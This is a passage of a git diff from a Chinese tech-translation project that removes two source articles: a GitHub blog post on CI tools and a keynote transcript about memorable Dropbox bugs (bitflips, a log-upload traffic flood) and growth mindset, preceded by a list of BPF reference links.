-[49]:http://openvswitch.org/support/ovscon2016/7/1245-bertrone.pdf -[50]:https://www.spinics.net/lists/xdp-newbies/msg00179.html -[51]:https://www.spinics.net/lists/xdp-newbies/msg00181.html -[52]:https://www.spinics.net/lists/xdp-newbies/msg00185.html -[53]:http://schd.ws/hosted_files/ossna2017/da/BPFandXDP.pdf -[54]:https://speakerdeck.com/tuxology/the-bsd-packet-filter -[55]:http://www.slideshare.net/brendangregg/bpf-tracing-and-more -[56]:http://fr.slideshare.net/brendangregg/linux-bpf-superpowers -[57]:https://www.socallinuxexpo.org/sites/default/files/presentations/Room%20211%20-%20IOVisor%20-%20SCaLE%2014x.pdf -[58]:https://events.linuxfoundation.org/sites/events/files/slides/ebpf_on_the_mainframe_lcon_2015.pdf -[59]:https://events.linuxfoundation.org/sites/events/files/slides/tracing-linux-ezannoni-linuxcon-ja-2015_0.pdf -[60]:https://events.linuxfoundation.org/sites/events/files/slides/bpf_collabsummit_2015feb20.pdf -[61]:https://lwn.net/Articles/603983/ -[62]:http://www.slideshare.net/vh21/meet-cutebetweenebpfandtracing -[63]:http://www.slideshare.net/vh21/linux-kernel-tracing -[64]:http://www.slideshare.net/ThomasGraf5/linux-networking-explained -[65]:http://www.slideshare.net/ThomasGraf5/linuxcon-2015-linux-kernel-networking-walkthrough -[66]:http://www.tcpdump.org/papers/bpf-usenix93.pdf -[67]:http://www.gsp.com/cgi-bin/man.cgi?topic=bpf -[68]:http://borkmann.ch/talks/2013_devconf.pdf -[69]:http://borkmann.ch/talks/2014_devconf.pdf -[70]:https://blog.cloudflare.com/introducing-the-bpf-tools/ -[71]:http://biot.com/capstats/bpf.html -[72]:https://www.iovisor.org/technology/xdp -[73]:https://github.com/iovisor/bpf-docs/raw/master/Express_Data_Path.pdf -[74]:https://events.linuxfoundation.org/sites/events/files/slides/iovisor-lc-bof-2016.pdf -[75]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#about-xdp-1 -[76]:http://netdevconf.org/1.2/session.html?herbert-xdp-workshop -[77]:https://schd.ws/hosted_files/2016p4workshop/1d/Intel%20Fastabend-P4%20on%20the%20Edge.pdf -[78]:https://ovsorbit.benpfaff.org/#e11 -[79]:http://open-nfp.org/media/pdfs/Open_NFP_P4_EBPF_Linux_TC_Offload_FINAL.pdf -[80]:https://opensource.googleblog.com/2016/11/cilium-networking-and-security.html -[81]:https://ovsorbit.benpfaff.org/ -[82]:http://blog.ipspace.net/2016/10/fast-linux-packet-forwarding-with.html -[83]:http://netdevconf.org/2.1/session.html?bertin -[84]:http://netdevconf.org/2.1/session.html?zhou -[85]:http://www.slideshare.net/IOVisor/ceth-for-xdp-linux-meetup-santa-clara-july-2016 -[86]:http://info.iet.unipi.it/~luigi/vale/ -[87]:https://github.com/YutaroHayakawa/vale-bpf -[88]:https://www.stamus-networks.com/2016/09/28/suricata-bypass-feature/ -[89]:http://netdevconf.org/1.2/slides/oct6/10_suricata_ebpf.pdf -[90]:https://www.slideshare.net/ennael/kernel-recipes-2017-ebpf-and-xdp-eric-leblond -[91]:https://github.com/iovisor/bpf-docs/blob/master/university/sigcomm-ccr-InKev-2016.pdf -[92]:https://fosdem.org/2017/schedule/event/go_bpf/ -[93]:https://wkz.github.io/ply/ -[94]:https://www.kernel.org/doc/Documentation/networking/filter.txt -[95]:https://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next.git/tree/Documentation/bpf/bpf_design_QA.txt?id=2e39748a4231a893f057567e9b880ab34ea47aef -[96]:https://github.com/iovisor/bpf-docs/blob/master/eBPF.md -[97]:https://github.com/iovisor/bcc/tree/master/docs -[98]:https://github.com/iovisor/bpf-docs/ -[99]:https://github.com/iovisor/bcc/blob/master/docs/reference_guide.md -[100]:http://man7.org/linux/man-pages/man2/bpf.2.html -[101]:http://man7.org/linux/man-pages/man8/tc-bpf.8.html -[102]:https://prototype-kernel.readthedocs.io/en/latest/bpf/index.html -[103]:http://docs.cilium.io/en/latest/bpf/ -[104]:https://ferrisellis.com/tags/ebpf/ -[105]:http://linux-ip.net/articles/Traffic-Control-HOWTO/ -[106]:http://lartc.org/lartc.html -[107]:https://git.kernel.org/cgit/linux/kernel/git/shemminger/iproute2.git/tree/man/man8 -[108]:https://git.kernel.org/pub/scm/linux/kernel/git/shemminger/iproute2.git/tree/doc?h=v4.13.0 -[109]:https://git.kernel.org/pub/scm/linux/kernel/git/shemminger/iproute2.git/tree/doc/actions?h=v4.13.0 -[110]:http://netdevconf.org/1.2/session.html?jamal-tc-workshop -[111]:https://git.kernel.org/cgit/linux/kernel/git/shemminger/iproute2.git/commit/bash-completion/tc?id=27d44f3a8a4708bcc99995a4d9b6fe6f81e3e15b -[112]:https://prototype-kernel.readthedocs.io/en/latest/networking/XDP/index.html -[113]:https://marc.info/?l=linux-netdev&m=147436253625672 -[114]:http://docs.cilium.io/en/latest/bpf/ -[115]:https://github.com/iovisor/bcc/blob/master/INSTALL.md -[116]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/include/linux/bpf.h -[117]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/include/uapi/linux/bpf.h -[118]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/include/linux/filter.h -[119]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/include/uapi/linux/filter.h -[120]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/kernel/bpf -[121]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/net/core/filter.c -[122]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/arch/x86/net/bpf_jit_comp.c -[123]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/net/sched -[124]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/kernel/trace/bpf_trace.c -[125]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/kernel/seccomp.c -[126]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/tools/testing/selftests/seccomp/seccomp_bpf.c -[127]:https://github.com/iovisor/bcc/blob/master/docs/kernel-versions.md -[128]:https://github.com/iovisor/bcc/blob/master/FAQ.txt -[129]:https://www.kernel.org/doc/Documentation/networking/filter.txt -[130]:https://github.com/iovisor/bcc/blob/master/docs/reference_guide.md -[131]:https://github.com/iovisor/bcc/blob/master/src/python/bcc/__init__.py -[132]:https://github.com/iovisor/bcc/blob/master/docs/reference_guide.md#output -[133]:https://www.spinics.net/lists/netdev/msg406926.html -[134]:https://github.com/cilium/bpf-map -[135]:https://github.com/badboy/bpf-map -[136]:https://stackoverflow.com/questions/tagged/bpf -[137]:https://github.com/iovisor/xdp-vagrant -[138]:https://github.com/zlim/bcc-docker -[139]:http://lists.openwall.net/netdev/ -[140]:http://vger.kernel.org/vger-lists.html#xdp-newbies -[141]:http://lists.iovisor.org/pipermail/iovisor-dev/ -[142]:https://twitter.com/IOVisor -[143]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#what-is-bpf -[144]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#dive-into-the-bytecode -[145]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#resources -[146]:https://github.com/qmonnet/whirl-offload/commits/gh-pages/_posts/2016-09-01-dive-into-bpf.md -[147]:http://netdevconf.org/1.2/session.html?jakub-kicinski -[148]:http://www.slideshare.net/IOVisor/express-data-path-linux-meetup-santa-clara-july-2016 -[149]:https://cdn.shopify.com/s/files/1/0177/9886/files/phv2017-gbertin.pdf -[150]:https://github.com/cilium/cilium -[151]:https://fosdem.org/2017/schedule/event/stateful_ebpf/ -[152]:http://vger.kernel.org/vger-lists.html#xdp-newbies -[153]:https://github.com/iovisor/bcc/blob/master/docs/kernel-versions.md -[154]:https://github.com/qmonnet/whirl-offload/commit/d694f8081ba00e686e34f86d5ee76abeb4d0e429 -[155]:http://openvswitch.org/pipermail/dev/2014-October/047421.html -[156]:https://qmonnet.github.io/whirl-offload/2016/07/15/beba-research-project/ -[157]:https://www.iovisor.org/resources/blog -[158]:http://www.brendangregg.com/blog/2016-03-05/linux-bpf-superpowers.html -[159]:http://p4.org/ -[160]:https://github.com/iovisor/bcc/tree/master/src/cc/frontends/p4 -[161]:https://github.com/p4lang/p4c/blob/master/backends/ebpf/README.md -[162]:https://github.com/iovisor/bcc/blob/master/docs/reference_guide.md -[163]:https://github.com/iovisor/bcc/blob/master/docs/tutorial_bcc_python_developer.md -[164]:https://github.com/goldshtn/linux-tracing-workshop -[165]:https://blog.yadutaf.fr/2017/07/28/tracing-a-packet-journey-using-linux-tracepoints-perf-ebpf/ -[166]:https://open-nfp.org/dataplanes-ebpf/technical-papers/ -[167]:http://netdevconf.org/2.1/session.html?gospodarek -[168]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/samples/bpf -[169]:https://git.kernel.org/cgit/linux/kernel/git/shemminger/iproute2.git/tree/examples/bpf -[170]:https://github.com/iovisor/bcc/tree/master/examples -[171]:http://man7.org/linux/man-pages/man8/tc-bpf.8.html -[172]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/net/core/dev.c -[173]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/drivers/net/ethernet/mellanox/mlx4/ -[174]:https://github.com/iovisor/bcc/ -[175]:https://github.com/iovisor/bcc/blob/master/src/python/bcc/__init__.py -[176]:https://github.com/iovisor/bcc/blob/master/src/cc/libbpf.c -[177]:https://git.kernel.org/cgit/linux/kernel/git/shemminger/iproute2.git/tree/tc -[178]:https://git.kernel.org/cgit/linux/kernel/git/shemminger/iproute2.git/tree/lib/bpf.c -[179]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/tools/net -[180]:https://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next.git/tree/tools/bpf -[181]:https://github.com/iovisor/bcc/tree/master/src/cc/frontends/p4/compiler -[182]:https://github.com/iovisor/bcc/tree/master/src/lua -[183]:https://reviews.llvm.org/D6494 -[184]:https://github.com/llvm-mirror/llvm/commit/4fe85c75482f9d11c5a1f92a1863ce30afad8d0d -[185]:https://github.com/iovisor/ubpf/ -[186]:https://github.com/YutaroHayakawa/generic-ebpf -[187]:https://github.com/YutaroHayakawa/vale-bpf -[188]:https://github.com/qmonnet/rbpf -[189]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git -[190]:https://github.com/torvalds/linux -[191]:https://github.com/iovisor/bcc/blob/master/docs/kernel-versions.md -[192]:https://qmonnet.github.io/whirl-offload/categories/#BPF diff --git a/sources/tech/20171107 GitHub welcomes all CI tools.md b/sources/tech/20171107 GitHub welcomes all CI tools.md deleted file mode 100644 index 7bef351bd6..0000000000 --- a/sources/tech/20171107 GitHub welcomes all CI tools.md +++ /dev/null @@ -1,95 +0,0 @@ -translating---geekpi - -GitHub welcomes all CI tools -==================== - - -[![GitHub and all CI tools](https://user-images.githubusercontent.com/29592817/32509084-2d52c56c-c3a1-11e7-8c49-901f0f601faf.png)][11] - -Continuous Integration ([CI][12]) tools help you stick to your team's quality standards by running tests every time you push a new commit and [reporting the results][13] to a pull request. Combined with continuous delivery ([CD][14]) tools, you can also test your code on multiple configurations, run additional performance tests, and automate every step [until production][15]. - -There are several CI and CD tools that [integrate with GitHub][16], some of which you can install in a few clicks from [GitHub Marketplace][17]. With so many options, you can pick the best tool for the job—even if it's not the one that comes pre-integrated with your system. - -The tools that will work best for you depends on many factors, including: - -* Programming language and application architecture - -* Operating system and browsers you plan to support - -* Your team's experience and skills - -* Scaling capabilities and plans for growth - -* Geographic distribution of dependent systems and the people who use them - -* Packaging and delivery goals - -Of course, it isn't possible to optimize your CI tool for all of these scenarios. The people who build them have to choose which use cases to serve best—and when to prioritize complexity over simplicity. For example, if you like to test small applications written in a particular programming language for one platform, you won't need the complexity of a tool that tests embedded software controllers on dozens of platforms with a broad mix of programming languages and frameworks. - -If you need a little inspiration for which CI tool might work best, take a look at [popular GitHub projects][18]. Many show the status of their integrated CI/CD tools as badges in their README.md. We've also analyzed the use of CI tools across more than 50 million repositories in the GitHub community, and found a lot of variety. The following diagram shows the relative percentage of the top 10 CI tools used with GitHub.com, based on the most used [commit status contexts][19] used within our pull requests. - - _Our analysis also showed that many teams use more than one CI tool in their projects, allowing them to emphasize what each tool does best._ - - [![Top 10 CI systems used with GitHub.com based on most used commit status contexts](https://user-images.githubusercontent.com/7321362/32575895-ea563032-c49a-11e7-9581-e05ec882658b.png)][20] - -If you'd like to check them out, here are the top 10 tools teams use: - -* [Travis CI][1] - -* [Circle CI][2] - -* [Jenkins][3] - -* [AppVeyor][4] - -* [CodeShip][5] - -* [Drone][6] - -* [Semaphore CI][7] - -* [Buildkite][8] - -* [Wercker][9] - -* [TeamCity][10] - -It's tempting to just pick the default, pre-integrated tool without taking the time to research and choose the best one for the job, but there are plenty of [excellent choices][21] built for your specific use cases. And if you change your mind later, no problem. When you choose the best tool for a specific situation, you're guaranteeing tailored performance and the freedom of interchangability when it no longer fits. - -Ready to see how CI tools can fit into your workflow? - -[Browse GitHub Marketplace][22] - --------------------------------------------------------------------------------- - -via: https://github.com/blog/2463-github-welcomes-all-ci-tools - -作者:[jonico ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://github.com/jonico -[1]:https://travis-ci.org/ -[2]:https://circleci.com/ -[3]:https://jenkins.io/ -[4]:https://www.appveyor.com/ -[5]:https://codeship.com/ -[6]:http://try.drone.io/ -[7]:https://semaphoreci.com/ -[8]:https://buildkite.com/ -[9]:http://www.wercker.com/ -[10]:https://www.jetbrains.com/teamcity/ -[11]:https://user-images.githubusercontent.com/29592817/32509084-2d52c56c-c3a1-11e7-8c49-901f0f601faf.png -[12]:https://en.wikipedia.org/wiki/Continuous_integration -[13]:https://github.com/blog/2051-protected-branches-and-required-status-checks -[14]:https://en.wikipedia.org/wiki/Continuous_delivery -[15]:https://developer.github.com/changes/2014-01-09-preview-the-new-deployments-api/ -[16]:https://github.com/works-with/category/continuous-integration -[17]:https://github.com/marketplace/category/continuous-integration -[18]:https://github.com/explore?trending=repositories#trending -[19]:https://developer.github.com/v3/repos/statuses/ -[20]:https://user-images.githubusercontent.com/7321362/32575895-ea563032-c49a-11e7-9581-e05ec882658b.png -[21]:https://github.com/works-with/category/continuous-integration -[22]:https://github.com/marketplace/category/continuous-integration diff --git a/sources/tech/20171112 Love Your Bugs.md b/sources/tech/20171112 Love Your Bugs.md deleted file mode 100644 index bf79f27cf7..0000000000 --- a/sources/tech/20171112 Love Your Bugs.md +++ /dev/null @@ -1,311 +0,0 @@ -Love Your Bugs -============================================================ - -In early October I gave a keynote at [Python Brasil][1] in Belo Horizonte. Here is an aspirational and lightly edited transcript of the talk. There is also a video available [here][2]. - -### I love bugs - -I’m currently a senior engineer at [Pilot.com][3], working on automating bookkeeping for startups. Before that, I worked for [Dropbox][4] on the desktop client team, and I’ll have a few stories about my work there. Earlier, I was a facilitator at the [Recurse Center][5], a writers retreat for programmers in NYC. I studied astrophysics in college and worked in finance for a few years before becoming an engineer. - -But none of that is really important to remember – the only thing you need to know about me is that I love bugs. I love bugs because they’re entertaining. They’re dramatic. The investigation of a great bug can be full of twists and turns. A great bug is like a good joke or a riddle – you’re expecting one outcome, but the result veers off in another direction. - -Over the course of this talk I’m going to tell you about some bugs that I have loved, explain why I love bugs so much, and then convince you that you should love bugs too. - -### Bug #1 - -Ok, straight into bug #1\. This is a bug that I encountered while working at Dropbox. As you may know, Dropbox is a utility that syncs your files from one computer to the cloud and to your other computers. - - - -``` - +--------------+ +---------------+ - | | | | - | METASERVER | | BLOCKSERVER | - | | | | - +-+--+---------+ +---------+-----+ - ^ | ^ - | | | - | | +----------+ | - | +---> | | | - | | CLIENT +--------+ - +--------+ | - +----------+ -``` - - -Here’s a vastly simplified diagram of Dropbox’s architecture. The desktop client runs on your local computer listening for changes in the file system. When it notices a changed file, it reads the file, then hashes the contents in 4MB blocks. These blocks are stored in the backend in a giant key-value store that we call blockserver. The key is the digest of the hashed contents, and the values are the contents themselves. - -Of course, we want to avoid uploading the same block multiple times. You can imagine that if you’re writing a document, you’re probably mostly changing the end – we don’t want to upload the beginning over and over. So before uploading a block to the blockserver the client talks to a different server that’s responsible for managing metadata and permissions, among other things. The client asks metaserver whether it needs the block or has seen it before. The “metaserver” responds with whether or not each block needs to be uploaded. - -So the request and response look roughly like this: The client says, “I have a changed file made up of blocks with hashes `'abcd,deef,efgh'`”. The server responds, “I have those first two, but upload the third.” Then the client sends the block up to the blockserver. - - -``` - +--------------+ +---------------+ - | | | | - | METASERVER | | BLOCKSERVER | - | | | | - +-+--+---------+ +---------+-----+ - ^ | ^ - | | 'ok, ok, need' | -'abcd,deef,efgh' | | +----------+ | efgh: [contents] - | +---> | | | - | | CLIENT +--------+ - +--------+ | - +----------+ -``` - - - -That’s the setup. So here’s the bug. - - - -``` - +--------------+ - | | - | METASERVER | - | | - +-+--+---------+ - ^ | - | | '???' -'abcdldeef,efgh' | | +----------+ - ^ | +---> | | - ^ | | CLIENT + - +--------+ | - +----------+ -``` - -Sometimes the client would make a weird request: each hash value should have been sixteen characters long, but instead it was thirty-three characters long – twice as many plus one. The server wouldn’t know what to do with this and would throw an exception. We’d see this exception get reported, and we’d go look at the log files from the desktop client, and really weird stuff would be going on – the client’s local database had gotten corrupted, or python would be throwing MemoryErrors, and none of it would make sense. - -If you’ve never seen this problem before, it’s totally mystifying. But once you’d seen it once, you can recognize it every time thereafter. Here’s a hint: the middle character of each 33-character string that we’d often see instead of a comma was `l`. These are the other characters we’d see in the middle position: - - -``` -l \x0c < $ ( . - -``` - -The ordinal value for an ascii comma – `,` – is 44\. The ordinal value for `l` is 108\. In binary, here’s how those two are represented: - -``` -bin(ord(',')): 0101100 -bin(ord('l')): 1101100 -``` - -You’ll notice that an `l` is exactly one bit away from a comma. And herein lies your problem: a bitflip. One bit of memory that the desktop client is using has gotten corrupted, and now the desktop client is sending a request to the server that is garbage. - -And here are the other characters we’d frequently see instead of the comma when a different bit had been flipped. - - - -``` -, : 0101100 -l : 1101100 -\x0c : 0001100 -< : 0111100 -$ : 0100100 -( : 0101000 -. : 0101110 -- : 0101101 -``` - - -### Bitflips are real! - -I love this bug because it shows that bitflips are a real thing that can happen, not just a theoretical concern. In fact, there are some domains where they’re more common than others. One such domain is if you’re getting requests from users with low-end or old hardware, which is true for a lot of laptops running Dropbox. Another domain with lots of bitflips is outer space – there’s no atmosphere in space to protect your memory from energetic particles and radiation, so bitflips are pretty common. - -You probably really care about correctness in space – your code might be keeping astronauts alive on the ISS, for example, but even if it’s not mission-critical, it’s hard to do software updates to space. If you really need your application to defend against bitflips, there are a variety of hardware & software approaches you can take, and there’s a [very interesting talk][6] by Katie Betchold about this. - -Dropbox in this context doesn’t really need to protect against bitflips. The machine that is corrupting memory is a user’s machine, so we can detect if the bitflip happens to fall in the comma – but if it’s in a different character we don’t necessarily know it, and if the bitflip is in the actual file data read off of disk, then we have no idea. There’s a pretty limited set of places where we could address this, and instead we decide to basically silence the exception and move on. Often this kind of bug resolves after the client restarts. - -### Unlikely bugs aren’t impossible - -This is one of my favorite bugs for a couple of reasons. The first is that it’s a reminder of the difference between unlikely and impossible. At sufficient scale, unlikely events start to happen at a noticable rate. - -### Social bugs - -My second favorite thing about this bug is that it’s a tremendously social one. This bug can crop up anywhere that the desktop client talks to the server, which is a lot of different endpoints and components in the system. This meant that a lot of different engineers at Dropbox would see versions of the bug. The first time you see it, you can  _really_  scratch your head, but after that it’s easy to diagnose, and the investigation is really quick: you look at the middle character and see if it’s an `l`. - -### Cultural differences - -One interesting side-effect of this bug was that it exposed a cultural difference between the server and client teams. Occasionally this bug would be spotted by a member of the server team and investigated from there. If one of your  _servers_  is flipping bits, that’s probably not random chance – it’s probably memory corruption, and you need to find the affected machine and get it out of the pool as fast as possible or you risk corrupting a lot of user data. That’s an incident, and you need to respond quickly. But if the user’s machine is corrupting data, there’s not a lot you can do. - -### Share your bugs - -So if you’re investigating a confusing bug, especially one in a big system, don’t forget to talk to people about it. Maybe your colleagues have seen a bug shaped like this one before. If they have, you might save a lot of time. And if they haven’t, don’t forget to tell people about the solution once you’ve figured it out – write it up or tell the story in your team meeting. Then the next time your teams hits something similar, you’ll all be more prepared. - -### How bugs can help you learn - -### Recurse Center - -Before I joined Dropbox, I worked for the Recurse Center. The idea behind RC is that it’s a community of self-directed learners spending time together getting better as programmers. That is the full extent of the structure of RC: there’s no curriculum or assignments or deadlines. The only scoping is a shared goal of getting better as a programmer. We’d see people come to participate in the program who had gotten CS degrees but didn’t feel like they had a solid handle on practical programming, or people who had been writing Java for ten years and wanted to learn Clojure or Haskell, and many other profiles as well. - -My job there was as a facilitator, helping people make the most of the lack of structure and providing guidance based on what we’d learned from earlier participants. So my colleagues and I were very interested in the best techniques for learning for self-motivated adults. - -### Deliberate Practice - -There’s a lot of different research in this space, and one of the ones I think is most interesting is the idea of deliberate practice. Deliberate practice is an attempt to explain the difference in performance between experts & amateurs. And the guiding principle here is that if you look just at innate characteristics – genetic or otherwise – they don’t go very far towards explaining the difference in performance. So the researchers, originally Ericsson, Krampe, and Tesch-Romer, set out to discover what did explain the difference. And what they settled on was time spent in deliberate practice. - -Deliberate practice is pretty narrow in their definition: it’s not work for pay, and it’s not playing for fun. You have to be operating on the edge of your ability, doing a project appropriate for your skill level (not so easy that you don’t learn anything and not so hard that you don’t make any progress). You also have to get immediate feedback on whether or not you’ve done the thing correctly. - -This is really exciting, because it’s a framework for how to build expertise. But the challenge is that as programmers this is really hard advice to apply. It’s hard to know whether you’re operating at the edge of your ability. Immediate corrective feedback is very rare – in some cases you’re lucky to get feedback ever, and in other cases maybe it takes months. You can get quick feedback on small things in the REPL and so on, but if you’re making a design decision or picking a technology, you’re not going to get feedback on those things for quite a long time. - -But one category of programming where deliberate practice is a useful model is debugging. If you wrote code, then you had a mental model of how it worked when you wrote it. But your code has a bug, so your mental model isn’t quite right. By definition you’re on the boundary of your understanding – so, great! You’re about to learn something new. And if you can reproduce the bug, that’s a rare case where you can get immediate feedback on whether or not your fix is correct. - -A bug like this might teach you something small about your program, or you might learn something larger about the system your code is running in. Now I’ve got a story for you about a bug like that. - -### Bug #2 - -This bug also one that I encountered at Dropbox. At the time, I was investigating why some desktop client weren’t sending logs as consistently as we expected. I’d started digging into the client logging system and discovered a bunch of interesting bugs. I’ll tell you only the subset of those bugs that is relevant to this story. - -Again here’s a very simplified architecture of the system. - - -``` - +--------------+ - | | - +---+ +----------> | LOG SERVER | - |log| | | | - +---+ | +------+-------+ - | | - +-----+----+ | 200 ok - | | | - | CLIENT | <-----------+ - | | - +-----+----+ - ^ - +--------+--------+--------+ - | ^ ^ | - +--+--+ +--+--+ +--+--+ +--+--+ - | log | | log | | log | | log | - | | | | | | | | - | | | | | | | | - +-----+ +-----+ +-----+ +-----+ -``` - -The desktop client would generate logs. Those logs were compress, encrypted, and written to disk. Then every so often the client would send them up to the server. The client would read a log off of disk and send it to the log server. The server would decrypt it and store it, then respond with a 200. - -If the client couldn’t reach the log server, it wouldn’t let the log directory grow unbounded. After a certain point it would start deleting logs to keep the directory under a maximum size. - -The first two bugs were not a big deal on their own. The first one was that the desktop client sent logs up to the server starting with the oldest one instead of starting with the newest. This isn’t really what you want – for example, the server would tell the client to send logs if the client reported an exception, so probably you care about the logs that just happened and not the oldest logs that happen to be on disk. - -The second bug was similar to the first: if the log directory hit its maximum size, the client would delete the logs starting with the newest instead of starting with the oldest. Again, you lose log files either way, but you probably care less about the older ones. - -The third bug had to do with the encryption. Sometimes, the server would be unable to decrypt a log file. (We generally didn’t figure out why – maybe it was a bitflip.) We weren’t handling this error correctly on the backend, so the server would reply with a 500\. The client would behave reasonably in the face of a 500: it would assume that the server was down. So it would stop sending log files and not try to send up any of the others. - -Returning a 500 on a corrupted log file is clearly not the right behavior. You could consider returning a 400, since it’s a problem with the client request. But the client also can’t fix the problem – if the log file can’t be decrypted now, we’ll never be able to decrypt it in the future. What you really want the client to do is just delete the log and move on. In fact, that’s the default behavior when the client gets a 200 back from the server for a log file that was successfully stored. So we said, ok – if the log file can’t be decrypted, just return a 200. - -All of these bugs were straightforward to fix. The first two bugs were on the client, so we’d fixed them on the alpha build but they hadn’t gone out to the majority of clients. The third bug we fixed on the server and deployed. - -### 📈 - -Suddenly traffic to the log cluster spikes. The serving team reaches out to us to ask if we know what’s going on. It takes me a minute to put all the pieces together. - -Before these fixes, there were four things going on: - -1. Log files were sent up starting with the oldest - -2. Log files were deleted starting with the newest - -3. If the server couldn’t decrypt a log file it would 500 - -4. If the client got a 500 it would stop sending logs - -A client with a corrupted log file would try to send it, the server would 500, the client would give up sending logs. On its next run, it would try to send the same file again, fail again, and give up again. Eventually the log directory would get full, at which point the client would start deleting its newest files, leaving the corrupted one on disk. - -The upshot of these three bugs: if a client ever had a corrupted log file, we would never see logs from that client again. - -The problem is that there were a lot more clients in this state than we thought. Any client with a single corrupted file had been dammed up from sending logs to the server. Now that dam was cleared, and all of them were sending up the rest of the contents of their log directories. - -### Our options - -Ok, there’s a huge flood of traffic coming from machines around the world. What can we do? (This is a fun thing about working at a company with Dropbox’s scale, and particularly Dropbox’s scale of desktop clients: you can trigger a self-DDOS very easily.) - -The first option when you do a deploy and things start going sideways is to rollback. Totally reasonable choice, but in this case, it wouldn’t have helped us. The state that we’d transformed wasn’t the state on the server but the state on the client – we’d deleted those files. Rolling back the server would prevent additional clients from entering this state but it wouldn’t solve the problem. - -What about increasing the size of the logging cluster? We did that – and started getting even more requests, now that we’d increased our capacity. We increased it again, but you can’t do that forever. Why not? This cluster isn’t isolated. It’s making requests into another cluster, in this case to handle exceptions. If you have a DDOS pointed at one cluster, and you keep scaling that cluster, you’re going to knock over its depedencies too, and now you have two problems. - -Another option we considered was shedding load – you don’t need every single log file, so can we just drop requests. One of the challenges here was that we didn’t have an easy way to tell good traffic from bad. We couldn’t quickly differentiate which log files were old and which were new. - -The solution we hit on is one that’s been used at Dropbox on a number of different occassions: we have a custom header, `chillout`, which every client in the world respects. If the client gets a response with this header, then it doesn’t make any requests for the provided number of seconds. Someone very wise added this to the Dropbox client very early on, and it’s come in handy more than once over the years. The logging server didn’t have the ability to set that header, but that’s an easy problem to solve. So two of my colleagues, Isaac Goldberg and John Lai, implemented support for it. We set the logging cluster chillout to two minutes initially and then managed it down as the deluge subsided over the next couple of days. - -### Know your system - -The first lesson from this bug is to know your system. I had a good mental model of the interaction between the client and the server, but I wasn’t thinking about what would happen when the server was interacting with all the clients at once. There was a level of complexity that I hadn’t thought all the way through. - -### Know your tools - -The second lesson is to know your tools. If things go sideways, what options do you have? Can you reverse your migration? How will you know if things are going sideways and how can you discover more? All of those things are great to know before a crisis – but if you don’t, you’ll learn them during a crisis and then never forget. - -### Feature flags & server-side gating - -The third lesson is for you if you’re writing a mobile or a desktop application:  _You need server-side feature gating and server-side flags._  When you discover a problem and you don’t have server-side controls, the resolution might take days or weeks as you push out a new release or submit a new version to the app store. That’s a bad situation to be in. The Dropbox desktop client isn’t going through an app store review process, but just pushing out a build to tens of millions of clients takes time. Compare that to hitting a problem in your feature and flipping a switch on the server: ten minutes later your problem is resolved. - -This strategy is not without its costs. Having a bunch of feature flags in your code adds to the complexity dramatically. You get a combinatoric problem with your testing: what if feature A is enabled and feature B, or just one, or neither – multiplied across N features. It’s extremely difficult to get engineers to clean up their feature flags after the fact (and I was also guilty of this). Then for the desktop client there’s multiple versions in the wild at the same time, so it gets pretty hard to reason about. - -But the benefit – man, when you need it, you really need it. - -# How to love bugs - -I’ve talked about some bugs that I love and I’ve talked about why to love bugs. Now I want to tell you how to love bugs. If you don’t love bugs yet, I know of exactly one way to learn, and that’s to have a growth mindset. - -The sociologist Carol Dweck has done a ton of interesting research about how people think about intelligence. She’s found that there are two different frameworks for thinking about intelligence. The first, which she calls the fixed mindset, holds that intelligence is a fixed trait, and people can’t change how much of it they have. The other mindset is a growth mindset. Under a growth mindset, people believe that intelligence is malleable and can increase with effort. - -Dweck found that a person’s theory of intelligence – whether they hold a fixed or growth mindset – can significantly influence the way they select tasks to work on, the way they respond to challenges, their cognitive performance, and even their honesty. - -[I also talked about a growth mindset in my Kiwi PyCon keynote, so here are just a few excerpts. You can read the full transcript [here][7].] - -Findings about honesty: - -> After this, they had the students write letters to pen pals about the study, saying “We did this study at school, and here’s the score that I got.” They found that  _almost half of the students praised for intelligence lied about their scores_ , and almost no one who was praised for working hard was dishonest. - -On effort: - -> Several studies found that people with a fixed mindset can be reluctant to really exert effort, because they believe it means they’re not good at the thing they’re working hard on. Dweck notes, “It would be hard to maintain confidence in your ability if every time a task requires effort, your intelligence is called into question.” - -On responding to confusion: - -> They found that students with a growth mindset mastered the material about 70% of the time, regardless of whether there was a confusing passage in it. Among students with a fixed mindset, if they read the booklet without the confusing passage, again about 70% of them mastered the material. But the fixed-mindset students who encountered the confusing passage saw their mastery drop to 30%. Students with a fixed mindset were pretty bad at recovering from being confused. - -These findings show that a growth mindset is critical while debugging. We have to recover from confusion, be candid about the limitations of our understanding, and at times really struggle on the way to finding solutions – all of which is easier and less painful with a growth mindset. - -### Love your bugs - -I learned to love bugs by explicitly celebrating challenges while working at the Recurse Center. A participant would sit down next to me and say, “[sigh] I think I’ve got a weird Python bug,” and I’d say, “Awesome, I  _love_  weird Python bugs!” First of all, this is definitely true, but more importantly, it emphasized to the participant that finding something where they struggled an accomplishment, and it was a good thing for them to have done that 